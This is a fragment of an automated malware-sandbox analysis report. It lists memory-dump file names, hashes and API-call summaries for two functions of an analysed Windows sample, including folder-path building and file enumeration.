                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: c992c6d20ed77966c031751b54ef796599eb02aea94ade1d32ab2dc0e8308452
                          • Instruction ID: c76c39d95bb442aba49d8ff04ef8f8ba348d7036d52f926b1b0e9f41293b7619
                          • Opcode Fuzzy Hash: c992c6d20ed77966c031751b54ef796599eb02aea94ade1d32ab2dc0e8308452
                          • Instruction Fuzzy Hash: 4DF09A32905204DBEB21BBF8D887F5E33A0AF00724F21414EF418AA2D2DB645E80AF56
                          Function 00CC4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4F7A
                          • lstrcat.KERNEL32(?,00CD1070), ref: 00CC4F97
                          • lstrcat.KERNEL32(?,01899C20), ref: 00CC4FAB
                          • lstrcat.KERNEL32(?,00CD1074), ref: 00CC4FBD
                            • Part of subcall function 00CC4910: wsprintfA.USER32 ref: 00CC492C
                            • Part of subcall function 00CC4910: FindFirstFileA.KERNEL32(?,?), ref: 00CC4943
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD0FDC), ref: 00CC4971
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD0FE0), ref: 00CC4987
                            • Part of subcall function 00CC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CC4B7D
                            • Part of subcall function 00CC4910: FindClose.KERNEL32(000000FF), ref: 00CC4B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 984218ee9dd756e992f0d0729b336673d2360758ced4315dc90e5f76303dea7c
                          • Instruction ID: 7a4614c457ec23111858aecace5cc12a9d91ad39e38292ff2b021639f0f99890
                          • Opcode Fuzzy Hash: 984218ee9dd756e992f0d0729b336673d2360758ced4315dc90e5f76303dea7c
                          • Instruction Fuzzy Hash: 1021B8B69002086BC754FBA0DC46FFA333CA794700F444568F65DA6181EE74AACCDBA2